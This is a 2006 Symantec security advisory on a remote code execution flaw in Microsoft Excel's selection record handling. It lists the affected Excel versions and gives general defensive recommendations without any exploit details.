Microsoft Excel Selection Record Variant Remote Code Execution Vulnerability
2006-07-11T00:00:00
ID: SMNTC-18885
Type: symantec
Reporter: Symantec Security Response
Modified: 2006-07-11T00:00:00
Description
Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vector.
Technologies Affected
Microsoft Excel 2000
Microsoft Excel 2000 SP2
Microsoft Excel 2000 SP3
Microsoft Excel 2000 SR1
Microsoft Excel 2002
Microsoft Excel 2002 SP1
Microsoft Excel 2002 SP2
Microsoft Excel 2002 SP3
Microsoft Excel 2003
Microsoft Excel 2003 SP1
Microsoft Excel 2003 SP2
Microsoft Excel 2004 for Mac
Microsoft Excel Viewer 2003
Microsoft Excel x for Mac
Recommendations
Run all software as a nonprivileged user with minimal access rights.
All non-administrative tasks should be performed as an unprivileged user with minimal access rights.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.
Do not accept or execute files from untrusted or unknown sources.
Users should never accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.
Do not follow links provided by unknown or untrusted sources.
Users should avoid websites of questionable integrity. Never follow links supplied by unknown or untrusted sources.
Implement multiple redundant layers of security.
Since this issue may be leveraged to execute code, we recommend memory-protection schemes, such as non-executable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.
Microsoft has released a security advisory addressing this issue.